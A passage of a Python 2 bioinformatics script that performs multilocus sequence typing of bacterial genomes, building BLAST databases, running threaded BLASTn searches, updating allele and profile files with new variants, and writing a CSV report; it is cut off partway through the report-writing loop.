parser.add_argument('-S', '--scheme', required=False,
                    help='The scheme you wish to use. Must match the folder name containing the scheme e.g. cgMLST.'
                         'Furthermore, this folder must contain two folders: "alleles" and "profile". The alleles '
                         'folder contains the allele files in .fasta format, and the profile folder contains '
                         'the profile in .txt format. Please note the requirements for the profile in the readme')
parser.add_argument('-u', '--updateProfileFalse', required=False, default=True,
                    help='By default, the program automatically creates new sequence profiles and appends these '
                         'profiles to the profile file. If, instead, you wish to wish to see the closest match of a '
                         'query genome to known reference profiles, set this to False.')
parser.add_argument('-U', '--updateAlleleFalse', required=False, default=True,
                    help='By default, the program automatically creates new allels and appends these '
                         'alleles to the appropriate file. If, instead, you wish to wish to see the closest match of a '
                         'query genome to known reference alleles, set this to False.')
# Get the arguments into a list
args = vars(parser.parse_args())
# Define variables from the arguments - there may be a more streamlined way to do this
# Add trailing slashes to the path variables to ensure consistent formatting (os.path.join)
path = os.path.join(args['path'], "")
cutoff = float(args['cutoff'])/100  # e.g. 98 -> 0.98
if args['sequencePath']:
    sequencePath = os.path.join(args['sequencePath'], "")
else:
    sequencePath = ""
if args['alleleProfilePath']:
    allelePath = os.path.join(args['alleleProfilePath'], "")
else:
    allelePath = ""
if args['organismPath']:
    organismPath = os.path.join(args['organismPath'], "")
else:
    organismPath = ""
scheme = args['scheme']
organism = args['organism']
updateProfile = args['updateProfileFalse']
updateAllele = args['updateAlleleFalse']
# Empty the updateProfile and/or updateAllele if they are not True - will be used in if checks later
# (any value supplied on the command line arrives as a string, so "False",
# "0" etc. all disable updating).
if updateProfile != True:
    updateProfile = ""
if updateAllele != True:
    updateAllele = ""
def make_path(inPath):
    """Create inPath (including parents) if it does not already exist.

    Based on: http://stackoverflow.com/questions/273192/check-if-a-directory-exists-and-create-it-if-necessary
    """
    try:
        os.makedirs(inPath)
    except OSError as err:
        # Ignore "already exists"; re-raise anything else (permissions, ...)
        if err.errno != errno.EEXIST:
            raise
def make_dict():
    """Return an autovivifying (Perl-style) dictionary: accessing a missing
    key creates a new nested make_dict() on the fly."""
    return defaultdict(make_dict)
# Progress counter shared by dotter() below.
count = 0
def dotter():
    """Write one progress '.' to stdout; after ~80 dots, start a fresh
    line prefixed with the current HH:MM:SS timestamp."""
    global count
    if count > 80:
        # Line is full: wrap to a new timestamped line and restart counting.
        sys.stdout.write('\n[%s] .' % (time.strftime("%H:%M:%S")))
        count = 1
    else:
        sys.stdout.write('.')
        count += 1
def makeblastdb(dqueue):
    """Worker loop: build a nucleotide BLAST database for every fasta path
    pulled from dqueue, skipping databases that already exist."""
    while True:  # while daemon
        fastapath = dqueue.get()  # grabs fastapath from dqueue
        # remove the path and the file extension for easier future globbing
        db = fastapath.split(".")[0]
        nhr = "%s.nhr" % db  # presence of the .nhr file marks an existing db
        if not os.path.isfile(str(nhr)):  # if check for already existing dbs
            # Discard makeblastdb's console output; the with-block also fixes
            # the original's leaked /dev/null file handle.
            with open(os.devnull, 'w') as FNULL:
                # Bug fix: wait for makeblastdb to finish before marking the
                # task done. The original fired Popen and returned at once,
                # so BLAST could run against a half-built database.
                subprocess.call(shlex.split("makeblastdb -in %s -dbtype nucl -out %s" % (fastapath, db)),
                                stdout=FNULL, stderr=FNULL)
            # make blastdb
            dotter()
        dqueue.task_done()  # signals to dqueue job is done
    sys.exit()  # unreachable after `while True`; kept from the original
# Declare queues, list, and dictionaries
dqueue = Queue()  # fasta files waiting for the makeblastdb workers
blastqueue = Queue()  # work queues for the threaded BLAST stages (consumers outside this excerpt)
testqueue = Queue()
plusqueue = Queue()
plusdict = defaultdict(make_dict)  # genome -> gene -> allele -> percent identity (filled by blastparse)
profileData = defaultdict(make_dict)
MLSTseqType = defaultdict(make_dict)
bestDict = defaultdict(make_dict)
resultProfile = defaultdict(make_dict)
genedict = defaultdict(list)
blastpath = []
threadlock = threading.Lock()  # lock shared by the worker threads
def makedbthreads(fastas):
    """Spawn one daemon makeblastdb worker per fasta file, queue all the
    files, and block until every queued file has been processed."""
    # Create and start threads for each fasta file in the list
    for _ in range(len(fastas)):
        # Send the threads to makeblastdb
        threads = Thread(target=makeblastdb, args=(dqueue,))
        # Daemon threads die with the main thread (modern attribute form of
        # the deprecated setDaemon()).
        threads.daemon = True
        # Start the threading
        threads.start()
    for fasta in fastas:
        # Add the fasta file to the queue
        dqueue.put(fasta)
    dqueue.join()  # wait on the dqueue until everything has been processed
def xmlout(fasta, genome):
    """Derive the gene/genome names and the tmp XML report path for a BLAST
    run, creating <path>/tmp if necessary.

    Returns the tuple (path, gene, genename, genomename, out, fasta).
    """
    global path
    # Extract the variables from the passed variables
    gene = fasta.split('/')[-1]  # split file from path, could use os.path.split
    genename = gene.split('.')[0]
    genomename = os.path.basename(genome).split(".")[0]
    # Create the tmp folder (if necessary)
    make_path("%stmp" % path)
    out = "%stmp/%s.%s.xml" % (path, genomename, genename)  # Changed from dictionary to tuple
    # Return the parsed variables
    return path, gene, genename, genomename, out, fasta
def alleleSplitter(alleleNames):
    """Split an allele FASTA title into (allele number, name prefix).

    Handles every naming scheme seen in the wild, tried in this order:
    ">12" (bare number), ">AROC_12", ">AROC-12", ">AROC 12", ">AROC12".
    If nothing matches, the whole title is used for both parts (which will
    raise ValueError on int() for non-numeric titles, as before).
    """
    # Plain ">12" style: the whole name is the allele number.
    bare = re.search(r"(>\d+)", alleleNames)
    if bare:
        return int(bare.group().split(">")[1]), ""
    # ">NAME_12", ">NAME-12", ">NAME 12": try each separator in turn.
    for separator in ("_", "-", " "):
        pieces = alleleNames.split(separator)
        if len(pieces) > 1:
            # pieces[1] is the allele number, pieces[0] the shared prefix.
            return int(pieces[1]), pieces[0]
    # ">NAME12": letters immediately followed by digits, no separator.
    fused = re.search(r"(>[A-z/a-z]+)(\d+)", alleleNames)
    if fused:
        return int(fused.groups()[1]), fused.groups()[0]
    # Nothing matched: mirror the original fallback.
    return int(alleleNames), alleleNames
def blastparse(blast_handle, genome, gene, cutoff, genepath):
    """Parse BLAST XML results for one genome/gene pair into plusdict.

    Perfect matches are recorded directly; near-perfect, full-length
    matches (>= cutoff identity) are optionally written back to the allele
    file as brand-new alleles (numbered from 1000000) when updateAllele is
    set; everything else records an "N" with 0% identity.

    :param blast_handle: file-like handle containing BLAST XML output
    :param genome: path to the query genome file (basename used as key)
    :param gene: gene name used as the second-level key in plusdict
    :param cutoff: fractional identity threshold for near matches
    :param genepath: path to the allele FASTA file (used when updating)
    """
    global plusdict
    global profileData
    global updateAllele
    # snpDict maps allele-file path -> mismatching HSP sequence to append
    snpDict = {}
    # dataDict maps genome name -> gene, for re-populating plusdict below
    dataDict = {}
    records = NCBIXML.parse(blast_handle)  # Open record from memory-mapped file
    dotter()
    # Split the extension from the genome name
    genomeName = os.path.basename(genome).split('.')[0]
    # Count the HSPs by scanning the raw XML text line-by-line
    numhsp = sum(line.count('<Hsp>') for line in iter(blast_handle.readline, ""))
    if numhsp >= 1:
        # The readline scan above left the handle at EOF; rewind so the
        # NCBIXML parser can read it from the beginning
        blast_handle.seek(0)
        # NOTE(review): historical comment said improperly-formatted XML from
        # crashed runs caused "end of record" errors here; unclear whether
        # this code path still guards against that
        for record in records:  # This process is just to retrieve HSPs from xml files
            for alignment in record.alignments:
                for hsp in alignment.hsps:
                    # Calculate the percent identity
                    percentIdentity = "%.2f" % float(float(hsp.identities) / float(alignment.length) * 100)
                    # The allele name is the last space-delimited token of the hit title
                    allele = str(alignment.title.split(" ")[-1])
                    # If the results are 100% identical to the reference allele, add them to the dictionary
                    if hsp.identities >= alignment.length:
                        # Clears out any "N" values in the dictionary
                        if "N" in plusdict[genomeName][gene]:
                            plusdict[genomeName][gene].clear()
                        plusdict[genomeName][gene][allele] = percentIdentity
                        # As the blast results files are not sorted by percent identity, and, at least for rMLST
                        # genes, not all genes are the same length, a match can occur after lots of close matches
                        snpDict.clear()
                    # Near match: only when no result exists yet, no pending
                    # update, and identity is within the cutoff of full length
                    elif not gene in plusdict[genomeName] and not snpDict and hsp.identities >= alignment.length * cutoff:
                        if updateAllele:
                            # Puts the HSP in the correct order - hits to the negative strand will be
                            # reversed compared to what we're looking for
                            if hsp.sbjct_start < hsp.sbjct_end:
                                end = hsp.sbjct_end
                            else:
                                end = hsp.sbjct_start
                            # Screen out hits that are shorter than the targets
                            # Keeping it this format even though this if statement could be re-written more efficiently
                            if end < alignment.length:
                                pass
                            else:
                                # Add the details of the mismatching allele to two dictionaries to be processed below
                                snpDict[genepath] = hsp.query
                                dataDict[genomeName] = gene
                        # If alleles aren't being updated, record the allele with its percent identity
                        else:
                            plusdict[genomeName][gene][allele] = percentIdentity
                    # Identity below the cutoff threshold, or the hsp is too short
                    elif not gene in plusdict[genomeName] and not snpDict:
                        plusdict[genomeName][gene]["N"] = 0
    # If there are no records, populate the dictionary with "N" and a 0% identity
    else:
        plusdict[genomeName][gene]["N"] = 0
    # Add matches that are cutoff < identity < 100% and full-length to the allele file
    if snpDict:
        # Initialise some variables
        alleleNames = []  # The allele names already in the allele file
        allelePreNumber = ""  # The text before the allele number e.g. >AROC
        alleleNumber = 0  # The last allele in the file e.g. 72
        # Go through the allele files in snpDict
        for gPath in snpDict:
            # Open the allele file
            with open(gPath) as geneFile:
                for line in geneFile:
                    # Only interested in the header for each allele
                    if ">" in line:
                        # Append all, but only use the last - used to be a string instead of a list
                        alleleNames.append(line)
            # Find the allele number and the text before the number for different formats
            alleleNumber, allelePreNumber = alleleSplitter(alleleNames[-1])
            # New allele numbers are kept distinct from originals by starting at 1000000
            if alleleNumber < 1000000:
                newAlleleNumber = 1000000
            # As this will continuously update the allele database, check if new alleles were already added
            else:
                newAlleleNumber = alleleNumber + 1
            # Initialise newAllele - formatted updated allele number e.g. >AROC1000000
            newAllele = ""
            # Accounts for no pre-number text being present (e.g. >12)
            if not allelePreNumber:
                # Create a sequence record using BioPython
                # NOTE(review): newAllele is left as "" on this branch, yet it is
                # used as the plusdict key below — presumably it should be
                # str(newAlleleNumber); confirm against intended output
                fasta = SeqRecord(Seq(snpDict[gPath], "fasta"),  # snpDict[gPath] is the hsp sequence
                                  description="",  # if this is not added, then some junk is written to the new header
                                  id=str(newAlleleNumber))  # keep the format of just the allele number e.g. >1000000
            # If there is pre-number text, do the same thing, but use the allele pre-number as well
            else:
                allelePreNumber = allelePreNumber.split(">")[1]
                newAllele = "%s-%s" % (allelePreNumber, newAlleleNumber)
                fasta = SeqRecord(Seq(snpDict[gPath], "fasta"),
                                  description="",
                                  id=newAllele)
            # Open the allele file to append the new sequence record
            with open(gPath, "a") as updatedFasta:
                # Use the SeqIO module to properly format the new sequence record
                SeqIO.write(fasta, updatedFasta, "fasta")
            # Cleanup: database/result files tied to the pre-update allele file must
            # be removed, or the changes will not be seen on later iterations
            # The path and file name of the allele file without an extension
            baseName = os.path.splitext(gPath)[0]  # Despite the fact that I don't use os.path.basename to generate this
            # Remake the database files
            updatedb = [gPath]
            makedbthreads(updatedb)
            # Now use this new allele in populating plusdict
            for updatedGenome in dataDict:
                # The percent identity has to be 100% - this allele matches itself
                plusdict[updatedGenome][dataDict[updatedGenome]][newAllele] = 100.00
    # Release the in-memory XML handle
    blast_handle.close()
class runblast(threading.Thread):
    """Worker thread: runs one BLASTn search per queue item and parses it.

    Items on the queue are (genome, fasta, blastexist, cutoff) tuples;
    results are accumulated in the module-level blastpath list and the
    plusdict results dictionary.
    """
    def __init__(self, blastqueue):
        # Queue of (genome, fasta, blastexist, cutoff) work items
        self.blastqueue = blastqueue
        threading.Thread.__init__(self)
    def run(self):
        # Loop forever; the thread is daemonised by the caller, so it dies
        # with the main program once the queue is drained
        while True:
            global blastpath, plusdict  # global variables shared with the parser
            genome, fasta, blastexist, cutoff = self.blastqueue.get()  # retrieve variables from queue
            path, gene, genename, genomename, out, genepath = xmlout(fasta, genome)  # retrieve from string splitter
            # Guard the shared blastpath list against concurrent appends
            threadlock.acquire()
            # Add the appropriate variables to blast path
            blastpath.append((out, path[-1], gene, genename,))  # tuple-list
            threadlock.release()
            # Print a dot for each gene, genome combination processed
            dotter()
            # Run the BioPython BLASTn module with the genome as query, fasta (target gene) as db,
            # a mild evalue of 0.1, and XML formatted output.
            # perc_identity is deliberately NOT passed so the same search results can
            # be re-parsed later with a different cutoff without re-running BLAST
            db = fasta.split(".")[0]
            blastn = NcbiblastnCommandline(query=genome, db=db, evalue=0.1, outfmt=5)
            # No output file is specified - the search results are kept in stdout
            stdout, stderr = blastn()
            # If 'Hsp' appears in stdout, at least one high-scoring pair was found
            if stdout.find('Hsp') != -1:
                blast_handle = StringIO(stdout)  # Convert string to IO object for parsing
                blastparse(blast_handle, genome, genename, cutoff, genepath)  # parse the data already in memory
            # If there are no hsps, then populate the dictionary with the negative results
            else:
                plusdict[genomename][genename]["N"] = 0
            # Mark the work item done so blastqueue.join() can return
            self.blastqueue.task_done()
def blastnthreads(fastas, genomes, cutoff):
    """Queue every genome/allele-file pair for the BLAST worker threads."""
    blastexist = {}
    # Every genome is searched against every allele (target gene) file
    for strain in genomes:
        for allele_file in fastas:
            # Hand one work item to the runblast worker pool
            blastqueue.put((strain, allele_file, blastexist, cutoff))
    # Block until the workers have drained the queue completely
    blastqueue.join()
def blastDatabaseClearer(genePath):
    """Delete stale BLAST database files (.nhr, .nin, .nsq, ...) in genePath.

    This program updates allele files in place, so databases built from a
    previous run must not be reused. Clearing them also stops glob() calls
    elsewhere from accidentally picking up database files (e.g. aroC.nhr
    next to aroC.fasta).
    """
    # Remove every file whose extension starts with ".n" in the folder
    for databaseFile in glob("%s/*.n*" % genePath):
        os.remove(databaseFile)
def organismChooser(path, alleleProfilePath, organismPath, schemeName, organismName):
    """Interactively (or from arguments) choose the organism/scheme to analyse.

    Resolves the allele FASTA files and the profile file either from an
    explicit allele/profile folder, or by prompting the user to pick an
    organism and typing scheme from the folders on disk.

    :param path: base analysis path (trailing slash required)
    :param alleleProfilePath: folder containing 'alleles' and 'profile' subfolders, or falsy
    :param organismPath: folder containing per-organism subfolders, or falsy
    :param schemeName: typing scheme name, or falsy to prompt
    :param organismName: organism name, or falsy to prompt
    :return: (alleles list, profile file, organismName, schemeName, profileTxt)
    """
    # Count variables used to label the numbered menu entries
    orgcount = 0
    schemecount = 0
    alleles = []
    profile = []
    # If the path of the folder containing the allele and profile subfolders is provided
    if alleleProfilePath:
        # Set the genePath variable for use in blastDatabaseClearer
        genePath = "%salleles" % alleleProfilePath
        # Remove any previously created blast database files
        blastDatabaseClearer(genePath)
        # Create lists of the alleles, and the profile
        alleles = glob("%salleles/*.*fa*" % alleleProfilePath)
        # If the profile has previously been processed in this script, use the .json file
        profile = glob("%sprofile/*.json" % alleleProfilePath)
        # Otherwise use the .txt file
        if not profile:
            profile = glob("%sprofile/*.txt" % alleleProfilePath)
    else:
        # Get a list of the organisms in the (default) Organism subfolder
        if not organismPath and not organismName:
            orgList = glob("%sOrganism/*" % path)
            # Iterate through the sorted list
            for folder in sorted(orgList):
                # Ensure that folder is, in actuality, a folder
                if os.path.isdir(folder):
                    # Print out the folder names and the count
                    print "[%s]: %s" % (orgcount, os.path.split(folder)[1])
                    orgcount += 1
            # Get the user input - the number entered corresponds to the list index
            # NOTE(review): under Python 2, input() evaluates the typed text as an
            # expression; raw_input() would be safer — confirm intent
            response = input("Please select an organism: ")
            # Get the organism path into a variable
            organism = sorted(orgList)[int(response)]
            organismName = os.path.split(organism)[1]
        elif organismPath and not organismName:
            orgList = glob("%s*" % organismPath)
            # Iterate through the sorted list
            for folder in sorted(orgList):
                # Ensure that folder is, in actuality, a folder
                if os.path.isdir(folder):
                    # Print out the folder names and the count
                    print "[%s]: %s" % (orgcount, os.path.split(folder)[1])
                    orgcount += 1
            # Get the user input - the number entered corresponds to the list index
            response = input("Please select an organism: ")
            # Get the organism path into a variable
            organism = sorted(orgList)[int(response)]
            organismName = os.path.split(organism)[1]
        # Get the schemes into a list
        if not schemeName:
            if not organismPath:
                schemeList = glob("%sOrganism/%s/*" % (path, organismName))
            else:
                schemeList = glob("%s/%s/*" % (organismPath, organismName))
            # Iterate through the sorted list
            for folder in sorted(schemeList):
                # Ensure that folder is, in actuality, a folder
                if os.path.isdir(folder):
                    # Print out the folder names and the count
                    print "[%s]: %s" % (schemecount, os.path.split(folder)[1])
                    schemecount += 1
            # Same as above
            schemeResponse = input("Please select a typing scheme:")
            scheme = sorted(schemeList)[int(schemeResponse)]
            schemeName = os.path.split(scheme)[1]
            # Set the variables as above
            genePath = "%s/alleles" % scheme
            blastDatabaseClearer(genePath)
            alleles = glob("%s/alleles/*.*fa*" % scheme)
            profile = glob("%s/profile/*.json" % scheme)
            if not profile:
                profile = glob("%s/profile/*.txt" % scheme)
        # If the name of the typing scheme is provided
        else:
            # If the organism path is not provided
            if not organismPath:
                # Default to using "Organism" in the path
                scheme = "%sOrganism/%s/%s" % (path, organismName, schemeName)
            else:
                # Otherwise set scheme as follows:
                scheme = "%s%s/%s" % (organismPath, organismName, schemeName)
            # Put the query and quality genes into lists
            genePath = "%s/alleles" % scheme
            blastDatabaseClearer(genePath)
            alleles = glob("%s/alleles/*.*fa*" % scheme)
            profile = glob("%s/profile/*.json" % scheme)
            if not profile:
                profile = glob("%s/profile/*.txt" % scheme)
    # Get the path for the original .txt profile file
    profileTxt = "%s.txt" % os.path.splitext(profile[0])[0]
    return alleles, profile[0], organismName, schemeName, profileTxt
def profilR(profileFile):
    """Create the sequence-type profile dictionary from the profile scheme.

    Reads the tab-delimited profile file, populates the global profileData
    dictionary as profileData[sequenceType][gene] = allele, and caches the
    result as a .json file next to the profile (parsing the json was ~10x
    faster than re-parsing the tab-delimited file on later runs).

    :param profileFile: path to the tab-delimited (or pre-cached) profile file
    :return: (profileData dictionary, ordered list of gene names)
    """
    global profileData
    # Naturally ordered list of the gene names, as some typing schemes are
    # not in any discernible order and a dict would lose the ordering
    geneList = []
    # Make the json filename from profileFile - it might already be .json, but this doesn't take long to do
    JSONProfile = "%s.json" % os.path.splitext(profileFile)[0]
    # Get the MLST profiles for each sequence type
    with open(profileFile) as profile:
        # Files have to be in tab-delimited format
        header = profile.readline().rstrip().split("\t")
        for gene in header:
            # The first column must have "ST" in the header; every other
            # column name is a gene in the scheme
            if not "ST" in gene:
                dotter()
                geneList.append(gene)
        # Don't re-parse if the .json cache has previously been created
        if not os.path.isfile(JSONProfile):
            for line in profile:
                # Hoisted out of the inner loop: the original re-split the
                # same line once per column, which was pure wasted work
                data = line.rstrip().split("\t")
                # MLSTcount associates the gene name in header with the allele (e.g. adk 12)
                MLSTcount = 1
                # len(header) will be the same length as the data in line
                while MLSTcount < len(header):
                    # Populate profileData with the sequence type, gene name, and the allele number
                    profileData[data[0]][header[MLSTcount]] = data[MLSTcount]
                    MLSTcount += 1
            # Write the json cache to disk; 'with' guarantees the handle is closed
            with open(JSONProfile, "wb") as JSONreport:
                output = json.dumps(profileData, sort_keys=True, indent=4, separators=(',', ': '))
                JSONreport.write(output)
        else:
            # Load the previously cached profile data
            with open(JSONProfile, "rb") as jsonReport:
                profileData = json.load(jsonReport)
    return profileData, geneList
def sequenceTyper(profileDict, profileFile, geneList, updateProfile):
    """Determine the sequence type of each strain by comparison to the profiles.

    For every genome in plusdict, counts how many gene alleles match each
    reference profile. Perfect profile matches go into resultProfile;
    partial matches go into MLSTseqType and, when updateProfile is set, a
    new profile is appended to the profile file via reProfilR.

    :param profileDict: profileData dictionary from profilR
    :param profileFile: path to the profile file (passed on to reProfilR)
    :param geneList: ordered list of gene names in the scheme
    :param updateProfile: whether to append new profiles for partial matches
    """
    global MLSTseqType
    global bestDict
    # Initialise variables
    header = 0
    alleleCount = 0
    multiAllele = []
    multiPercent = []
    bestMatch = defaultdict(int)
    bestCount = 0
    # Iterate through the genomes
    for genome in plusdict:
        global resultProfile
        # bestMatch[genome] maps sequence type -> number of matching genes
        bestMatch[genome] = defaultdict(int)
        # For each gene in plusdict[genome]
        for gene in plusdict[genome]:
            # Clear the appropriate count and lists
            alleleCount = 0
            multiAllele = []
            multiPercent = []
            for allele, percentID in plusdict[genome][gene].iteritems():
                # "N" alleles screw up the allele splitter function
                if allele != "N":
                    # Use the alleleSplitter function to get the allele number
                    alleleNumber, allelePreNumber = alleleSplitter(allele)
                    # alleleNumber is treated as an integer for proper sorting
                    multiAllele.append(int(alleleNumber))
                    multiPercent.append(percentID)
                # If the allele is "N"
                else:
                    # Append "N" and a percent identity of 0
                    multiAllele.append("N")
                    multiPercent.append(0)
            # Catch cases where the allele isn't "N", but can't be parsed by alleleSplitter
            if not multiAllele:
                multiAllele.append("N")
                multiPercent.append(0)
            # Populate bestDict with genome, gene, alleles joined with a space (allele
            # is a list generated by the .iteritems() above), and the percent identity
            bestDict[genome][gene][" ".join(str(allele) for allele in sorted(multiAllele))] = multiPercent[0]
            # Find the profile with the most alleles in common with the query genome
            for sequenceType in profileDict:
                # Reset counts to 0
                matchCount = 0
                bestCount = 0
                # The number of genes in the analysis
                header = len(profileData[sequenceType])
                # refAllele is the allele number of the sequence type
                refAllele = profileData[sequenceType][gene]
                # If there are multiple allele matches for a gene in the reference profile e.g. 10 692
                if len(refAllele.split(" ")) > 1:
                    # Treat the split alleles as integers so they sort properly
                    intRefAllele = map(int, refAllele.split(" "))
                    # Create a string of the joined, sorted alleles
                    sortedRefAllele = " ".join(str(allele) for allele in sorted(intRefAllele))
                else:
                    # Use the reference allele as the sortedRefAllele
                    sortedRefAllele = refAllele
                for allele, percentID in bestDict[genome][gene].iteritems():
                    # Multi-allele strings were sorted identically on both sides, so
                    # e.g. "10 692" will always compare equal to "10 692", never "692 10"
                    if allele == sortedRefAllele:
                        # Increment the number of matches to each profile
                        bestMatch[genome][sequenceType] += 1
        # Get the best number of matches
        # From: https://stackoverflow.com/questions/613183/sort-a-python-dictionary-by-value
        sortedMatches = sorted(bestMatch[genome].items(), key=operator.itemgetter(1), reverse=True)[0][1]
        # If there are fewer matches than the total number of genes in the typing scheme
        if int(sortedMatches) < header:
            # Iterate through the sequence types and the number of matches in bestDict for each genome
            for sequenceType, matches in bestMatch[genome].iteritems():
                # If the number of matches for a profile matches the best number of matches
                if matches == sortedMatches:
                    # Iterate through the genes in the analysis
                    for gene in profileData[sequenceType]:
                        # Get the reference allele as above
                        refAllele = profileData[sequenceType][gene]
                        # As above get the reference allele split and ordered as necessary
                        if len(refAllele.split(" ")) > 1:
                            intRefAllele = map(int, refAllele.split(" "))
                            sortedRefAllele = " ".join(str(allele) for allele in sorted(intRefAllele))
                        else:
                            sortedRefAllele = refAllele
                        # Populate the sequence type dictionary with the genome, best match to profile, number of
                        # matches to the profile, gene, query allele(s), reference allele(s), and percent identity
                        MLSTseqType[genome][sequenceType][sortedMatches][gene][str(bestDict[genome][gene].keys()[0])][sortedRefAllele] = str(bestDict[genome][gene].values()[0])
                    # Add the new profile to the profile file (if the option is enabled)
                    if updateProfile:
                        reProfilR(int(header), profileFile, geneList, genome)
        # Otherwise, the query profile matches the reference profile
        else:
            # Iterate through best match
            for sequenceType, matches in bestMatch[genome].iteritems():
                if matches == sortedMatches:
                    for gene in profileData[sequenceType]:
                        # Populate resultProfile with the genome, best match to profile, number of
                        # matches to the profile, gene, query allele(s), reference allele(s), and percent identity
                        resultProfile[genome][sequenceType][sortedMatches][gene][str(bestDict[genome][gene].keys()[0])] = str(bestDict[genome][gene].values()[0])
            # Progress indicator for each fully-typed genome
            dotter()
def reProfilR(numGenes, profileFile, geneList, genome):
    """Create and append a new (>= 1000000, '_CFIA'-suffixed) profile as required.

    Builds a new tab-delimited profile row from the partial-match data in
    MLSTseqType[genome], appends it to the profile file, invalidates the
    cached .json profile, and re-runs profilR so later genomes see the
    updated scheme.

    :param numGenes: number of genes in the typing scheme
    :param profileFile: path to the tab-delimited profile file
    :param geneList: ordered list of gene names (defines column order)
    :param genome: name of the genome whose partial match triggers the new profile
    """
    global MLSTseqType
    global bestDict
    global resultProfile
    global profileData
    profileNumber = 0
    lastEntry = 0
    newProfile = ""
    # (Previously iterated over all of MLSTseqType; now handles one genome per call)
    # Reset newProfile
    newProfile = ""
    # Find the last profile entry in the file: the command line tool 'tail' reads
    # the last line (-1), which is split on tabs; only the first field (the
    # sequence type number) is kept
    profile = subprocess.check_output(['tail', '-1', profileFile]).split("\t")[0]
    # Split the _CFIA from the number - if there is no "_", then just use profile as the profile number
    # NOTE(review): str.split never raises IndexError for element [0]; the
    # fallback is presumably meant to catch non-numeric prefixes — confirm
    try:
        profileNumber = int(profile.split("_")[0])
    except IndexError:
        profileNumber = int(profile)
    # If the number is less than 1000000, then new profiles have not previously been added
    if profileNumber < 1000000:
        # Set the new last entry number to be 1000000
        lastEntry = 1000000
    # If profiles have previously been added
    else:
        # Set last entry to the highest profile number plus one
        lastEntry = profileNumber + 1
    # As there can be multiple profiles in MLSTseqType, this loop only needs to be performed once
    seqCount = 0
    # Go through the sequence types
    for sequenceType in MLSTseqType[genome]:
        # Only do this once
        if seqCount == 0:
            # Start the newProfile string with the new profile name (e.g. 1000000_CFIA)
            newProfile = "%s_CFIA" % str(lastEntry)
            # The number of matches to the reference profile
            for numMatches in MLSTseqType[genome][sequenceType]:
                # The genes in geneList - should be in the correct order
                for gene in geneList:
                    # The allele for each gene in the query genome
                    for allele in MLSTseqType[genome][sequenceType][numMatches][gene]:
                        # Append the allele to newProfile
                        newProfile += "\t%s" % str(allele)
                        # Add the MLST results for the query genome as well as the new profile data to resultProfile
                        resultProfile[genome]["%s_CFIA" % str(lastEntry)][numGenes][gene][allele] = MLSTseqType[genome][sequenceType][numMatches][gene][allele].values()[0]
        seqCount += 1
    # Only perform the next steps if newProfile exists
    if newProfile:
        # Open the profile file to append
        appendFile = open(profileFile, "ab")
        # Append the newProfile to the end of the profile file
        appendFile.write("%s\n" % newProfile)
        # Close the profile file
        appendFile.close()
        # Remove the .json cache with the old profile information
        jsonProfile = "%s.json" % os.path.splitext(profileFile)[0]
        try:
            os.remove(jsonProfile)
        except OSError:
            # With multiple new profiles the file may already be gone; allow a pass
            pass
        # Re-run profilR with the updated files
        profilR(profileFile)
def blaster(path, cutoff, sequencePath, targetPath, organismPath, scheme, organism):
    """
    The blaster function is the stack manager of the module.

    Chooses the organism/scheme, builds BLAST databases, fans the searches
    out over worker threads, determines sequence types, and writes a
    timestamped CSV report under <path>reports/.

    markers are the target fasta folder that will be db'd and BLAST'd against strains folder
    out is the working directory where the blastxml folder will be placed
    name is the partial title of the csv output
    ALL PATHS REQUIRE TRAILING SLASHES!!!

    :param path: base analysis path
    :param cutoff: fractional identity cutoff passed to the parsers
    :param sequencePath: folder containing the query genome .fa* files
    :param targetPath: folder containing 'alleles'/'profile' subfolders (or falsy)
    :param organismPath: folder of per-organism data (or falsy)
    :param scheme: typing scheme name (or falsy to prompt)
    :param organism: organism name (or falsy to prompt)
    """
    # Time is used to calculate length of the analyses
    start = time.time()
    # Import global variables
    global count, genedict, blastpath, plusdict, updateProfile
    # Initialise genedict
    genedict = defaultdict(list)
    blastpath = []
    # Run organism chooser to allow the user to choose which databases to use;
    # returns the organism name, lists of alleles and the profile
    alleles, profile, organismName, schemeName, profileFile = organismChooser(path, targetPath, organismPath, scheme, organism)
    print "[%s] Reading sequence profiles" % (time.strftime("%H:%M:%S"))
    profileDict, geneList = profilR(profileFile)
    # reset count to 0 (progress-dot counter)
    count = 0
    # Get the genome files into a list - note that they must be in the "sequences" subfolder of the path,
    # and they must have a file extension beginning with ".fa"
    strains = glob("%s*.fa*" % sequencePath)
    # Create one daemon worker thread per strain for the BLAST analysis
    for i in range(len(strains)):
        threads = runblast(blastqueue)
        threads.setDaemon(True)
        threads.start()
    print "\n[%s] Creating necessary databases for BLAST" % (time.strftime("%H:%M:%S"))
    # Push targets to threads
    makedbthreads(alleles)
    print "\n[%s] Performing and parsing BLAST database searches" % (time.strftime("%H:%M:%S"))
    # reset count to 0
    count = 0
    # Make blastn threads and retrieve xml file locations
    blastnthreads(alleles, strains, cutoff)
    # reset count to 0
    count = 0
    print "\n[%s] Determining sequence types" % (time.strftime("%H:%M:%S"))
    # Determine sequence types
    sequenceTyper(profileDict, profileFile, geneList, updateProfile)
    # Parse the results into a report
    csvheader = ''
    # Initialise variables
    row = ""
    rowcount = 0
    # Make the reports folder if necessary
    make_path("%sreports" % path)
    # Open the csv report - add the organism name, the scheme name and the date to keep reports unique
    with open("%sreports/%s_%s_results_%s.csv" % (path, organismName, schemeName, time.strftime("%Y.%m.%d.%H.%M.%S")), 'wb') as csvfile:
        # Get the header started
        csvheader = "Strain,SequenceType,Matches,"
        # Initialise the headerGenes variable
        headerGenes = ''
        for gene in geneList:
            # Append each gene to headerGenes
            headerGenes += "%s," % gene
        # Append headerGenes to the header
        csvheader += headerGenes
        # Write the header to the report
        csvfile.write(csvheader)
        # Iterate through all the query genomes
        for genome in plusdict:
            # Reset resultString to a newline
            resultString = "\n"
            # Reset the counts to 0
            sequenceTypeCount = 0
            resProfileCount = 0
            # Genomes with a perfect profile match are in resultProfile
            if genome in resultProfile:
                # If, as is the case for cgMLST, there are multiple identical profiles,
                # the formatting of the report is automatically changed
                if len(resultProfile[genome]) == 1:
                    # Iterate through the sequence types
                    for sequenceType in resultProfile[genome]:
                        # Put the genome and the sequence type in the result string
                        resultString += "%s,%s, " % (genome, sequenceType)
                        # Report the number of matches to the profile
                        for numMatches in resultProfile[genome][sequenceType]:
                            # Append these matches
                            resultString += "%s," % numMatches
                            # Go through the ordered list of genes
                            for gene in geneList:
                                # Add each allele to the result string
                                for allele in resultProfile[genome][sequenceType][numMatches][gene]:
                                    # 100% and 0% ("N") matches are printed without the percent identity
                                    if float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 100 \
                                            or float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 0:
